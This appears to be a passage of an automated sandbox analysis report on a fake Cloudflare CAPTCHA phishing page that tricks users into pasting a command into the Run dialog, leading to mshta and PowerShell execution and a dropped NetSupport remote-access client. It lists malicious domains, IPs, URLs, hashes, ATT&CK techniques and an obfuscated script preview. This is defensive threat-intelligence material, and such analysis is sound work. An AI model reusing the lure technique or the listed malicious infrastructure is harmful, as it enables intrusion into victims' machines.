                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeQueries volume information: C:\ VolumeInformation
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLL, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLL, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fzxYFa\TCCTL32.DLL, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLL, type: DROPPED
                      Source: Yara matchFile source: 00000014.00000000.1965756689.0000000000C92000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000000.1965756689.0000000000C9F000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2448322390.00000000111E1000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2452337162.000000006C620000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2431973986.0000000000C92000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2433899742.0000000001118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2447675169.0000000011193000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Windows Management Instrumentation
                      1
                      Browser Extensions
                      11
                      Process Injection
                      11
                      Masquerading
                      OS Credential Dumping2
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Data Obfuscation
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      PowerShell
                      11
                      Registry Run Keys / Startup Folder
                      11
                      Registry Run Keys / Startup Folder
                      41
                      Virtualization/Sandbox Evasion
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      Security Account Manager41
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive11
                      Ingress Tool Transfer
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      DLL Side-Loading
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
                      System Network Configuration Discovery
                      SSHKeylogging14
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
                      File and Directory Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync32
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLL3%ReversingLabs
                      C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLL3%ReversingLabs
                      C:\Users\user\AppData\Roaming\fzxYFa\msvcr100.dll0%ReversingLabs
                      C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dll3%ReversingLabs
                      C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLL12%ReversingLabs
                      C:\Users\user\AppData\Roaming\fzxYFa\TCCTL32.DLL3%ReversingLabs
                      C:\Users\user\AppData\Roaming\fzxYFa\client32.exe13%ReversingLabs
                      C:\Users\user\AppData\Roaming\fzxYFa\remcmdstub.exe12%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      traversecityspringbreak.com
                      166.1.160.211
                      truetrue
                        unknown
                        inspyrehomedesign.com
                        166.1.160.75
                        truetrue
                          unknown
                          geo.netsupportsoftware.com
                          172.67.68.212
                          truefalse
                            unknown
                            www.google.com
                            142.250.186.164
                            truefalse
                              unknown
                              i.ibb.co
                              169.197.85.95
                              truefalse
                                unknown
                                use.fontawesome.com
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://92.255.85.135/fakeurl.htmtrue
                                    unknown
                                    http://geo.netsupportsoftware.com/location/loca.asptrue
                                      unknown
                                      https://inspyrehomedesign.com/true
                                        unknown
                                        http://traversecityspringbreak.com/o/o.pngtrue
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          1.1.1.1
                                          unknownAustralia
                                          13335CLOUDFLARENETUSfalse
                                          172.67.142.245
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          142.250.186.163
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          166.1.160.211
                                          traversecityspringbreak.comUnited States
                                          11798ACEDATACENTERS-AS-1UStrue
                                          172.67.68.212
                                          geo.netsupportsoftware.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          162.19.58.159
                                          unknownUnited States
                                          209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                          142.251.173.84
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          239.255.255.250
                                          unknownReserved
                                          unknownunknownfalse
                                          92.255.85.135
                                          unknownRussian Federation
                                          42097SOVTEL-ASRUfalse
                                          142.250.185.142
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          166.1.160.75
                                          inspyrehomedesign.comUnited States
                                          11798ACEDATACENTERS-AS-1UStrue
                                          142.250.185.195
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.186.164
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          184.28.90.27
                                          unknownUnited States
                                          16625AKAMAI-ASUSfalse
                                          216.58.212.174
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.16.196
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          169.197.85.95
                                          i.ibb.coUnited States
                                          26548PUREVOLTAGE-INCUSfalse
                                          IP
                                          192.168.2.16
                                          127.0.0.1
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1544091
                                          Start date and time:2024-10-28 19:50:33 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Sample URL:https://inspyrehomedesign.com
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:22
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal84.phis.troj.win@31/30@17/158
                                          • Exclude process from analysis (whitelisted): svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 216.58.212.174, 142.251.173.84, 142.250.185.195, 34.104.35.123, 2.19.126.163, 172.67.142.245, 104.21.27.152
                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, use.fontawesome.com.cdn.cloudflare.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: https://inspyrehomedesign.com
                                          InputOutput
                                          URL: Model: claude-3-5-sonnet-latest
                                          {
                                              "typosquatting": false,
                                              "unusual_query_string": false,
                                              "suspicious_tld": false,
                                              "ip_in_url": false,
                                              "long_subdomain": false,
                                              "malicious_keywords": false,
                                              "encoded_characters": false,
                                              "redirection": false,
                                              "contains_email_address": false,
                                              "known_domain": false,
                                              "brand_spoofing_attempt": false,
                                              "third_party_hosting": false
                                          }
                                          URL: URL: https://inspyrehomedesign.com
                                          URL: https://inspyrehomedesign.com/ Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "contains_trigger_text": true,
                                            "trigger_text": "Verify you are human by completing the action below.",
                                            "prominent_button_name": "Verify you are human",
                                            "text_input_field_labels": "unknown",
                                            "pdf_icon_visible": false,
                                            "has_visible_captcha": true,
                                            "has_urgent_text": false,
                                            "has_visible_qrcode": false
                                          }
                                          URL: https://inspyrehomedesign.com/ Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": [
                                              "CloudFlare"
                                            ]
                                          }
                                          URL: https://inspyrehomedesign.com/ Model: gpt-4o
                                          ```json{  "legit_domain": "cloudflare.com",  "classification": "wellknown",  "reasons": [    "The brand 'CloudFlare' is well-known and typically associated with the domain 'cloudflare.com'.",    "The provided URL 'inspyrehomedesign.com' does not match the legitimate domain for CloudFlare.",    "The URL does not contain any elements that suggest a direct association with CloudFlare.",    "The URL appears to be unrelated to the CloudFlare brand, suggesting a potential phishing attempt.",    "The presence of generic input fields labeled as 'u, n, k, n, o, w, n' is suspicious and not typical for a legitimate CloudFlare page."  ],  "riskscore": 9}
                                          Google indexed: False
                                          URL: inspyrehomedesign.com
                                                      Brands: CloudFlare
                                                      Input Fields: u, n, k, n, o, w, n
                                          URL: https://inspyrehomedesign.com/ Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                              "contains_trigger_text": true,
                                              "trigger_text": "Verification Steps",
                                              "prominent_button_name": "VERIFY",
                                              "text_input_field_labels": [
                                                  "Press & hold the Windows Key  R",
                                                  "In the verification window, press Ctrl + V",
                                                  "Press Enter on your keyboard to finish"
                                              ],
                                              "pdf_icon_visible": false,
                                              "has_visible_captcha": true,
                                              "has_urgent_text": false,
                                              "has_visible_qrcode": false
                                          }
                                          URL: https://inspyrehomedesign.com/ Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": [
                                              "CloudFlare"
                                            ]
                                          }
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.8167808059897579
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:771E78598EBB3652DB6F7DD2EE42A50D
                                          SHA1:ED09EF5278F8C2C2C85FB743CA70F4B135C7769A
                                          SHA-256:42D97B178AE755CABCAF6C70A71605BAE4DDA97F758FDC14B5B20FECE7888A6C
                                          SHA-512:F0D7369DC59582A40ECEA999AA6CDD1D933606A9244C37E93CCE462C50B1FD744CE8877629B46BAD25F364A3603DC5720BB7480CC81E4D072322C65F4E2F1D88
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):16384
                                          Entropy (8bit):0.081424227967031
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:16091372AB9F0648CD5E4474D1806272
                                          SHA1:5C7796603A16671711837EF415707012D4E9DFFB
                                          SHA-256:8E43672FC70066623A0023B85FB169C7A702AFB61E3433B497546D88016CDA84
                                          SHA-512:8DF63D91B5640D1F094AFD46A44633566D08FF238328DC66BF876294A3F781C59C7638CF15E62784EB60F04EDC896F4A0E4A71B4EB2A8A124903BE0B41817962
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.P.9.....................................;...{...3...|#.. ...{........... ...{... ...{..#.#.. ...{.|................xm.g.3...|#.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\fzxYFa\client32.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:modified
                                          Size (bytes):15
                                          Entropy (8bit):2.7329145639793984
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                          SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                          SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                          SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:32.7767,-96.797
                                          Process:C:\Windows\System32\mshta.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):10478
                                          Entropy (8bit):6.1437966409549345
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:977BB6913B1F65A6472727EA4F362E97
                                          SHA1:1D1247A8F9359576C913E9586D72F0D51773B22C
                                          SHA-256:CACE794532FFC2A8275C86E4248CA38CF85DFB209D630E05E049D6FE2047EA2E
                                          SHA-512:02E3D08AFED87051CD5D7DE046CFECE58731901EF985F8A76E4110130ED4A364ABAC06E77D124E185E146502BF4170AAF07E81272DB9C100FAFF878ACFE48EFA
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><script>l1l=document.documentMode||document.all;var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6efa|=lII;zLP=location.protocol+'0FD';ilY5HP79zs2='e6Fwtnl9Iy7X';</script><script>oS3zB7k=new Array();oS3zB7k[0]='\141\151\165%31%49%4A%31%33%48\121%32%38';wL6mXZ4=new Array();wL6mXZ4[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.\r.\n.<~W. .x~.~/.=."~=~?~A~C~E
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):11608
                                          Entropy (8bit):4.890472898059848
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):17640
                                          Entropy (8bit):5.486548466185529
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:258A6F429AFE9BAE7FF8FD285CBFC01F
                                          SHA1:D6F3FEDD144DD796CF78CA20396A458116FF7160
                                          SHA-256:4D13DA5D062FD418E6175C5A93E2A231CAD838BD02F779A13072D29C50202B3D
                                          SHA-512:6766B116B5517BC8F6EFD51BD42D1123DF0BDA3159933C332E26BE076720A6D5B8869DF8965B5D6A05660E35DC196230E67769357B6C4CA755E62B27B170052E
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:@...e................................................@..........H...............o..b~.D.poM...C..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....8.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.F.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:51:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2673
                                          Entropy (8bit):3.9753054326533324
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:019BE1A7AF3D28823E73B512D06F0FCF
                                          SHA1:1E40ECF77E2958D1C8F15FE6AF6C37BD3F5B203D
                                          SHA-256:6D10BFE6532E42E0D59243862AFFA5CE8F644908D290D4B93629BE6191C07346
                                          SHA-512:3095C501920B87D940C35FBF9C37EF79100926FB8E28E5B8F4309A12CC78A94588A0A8F0B9E8705AF6502373208944A65041A27EEDD0C7D9C8CF020347902CF9
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....!..Wj)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\YV.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Ya.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Ya.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Ya............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Yb............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............w.:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:51:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2675
                                          Entropy (8bit):3.9917322506507267
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B2547251B8D1620C9AE6DABD747E5AAA
                                          SHA1:1156FA0BBF1B5DBABC10DD31B31997DE9EDF734A
                                          SHA-256:39DCBBCF4A4DB027147A3BECFA1E84185DC780FD09279836F21B507E3B82CC43
                                          SHA-512:AB7D6368910AF00AEFD2FA768690D0B8D01964A2FAA5F2FCB4B75BD8BC7B6407A0E492460606FCFA7372B4F2C15077D99E9D56A65D0FFDA1B84DC1A2B44A1F14
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.......Wj)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\YV.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Ya.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Ya.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Ya............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Yb............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............w.:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2689
                                          Entropy (8bit):4.001868914932604
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A9F3AEA57E77D06ABD294360DB46800F
                                          SHA1:CB46416D85F5A2EACE44B3F8B3371EDC5E655F08
                                          SHA-256:A84716C27D7FB2F4E73BE30749A17BCAAA1D9E69FAF75BA325479DD17A6158D1
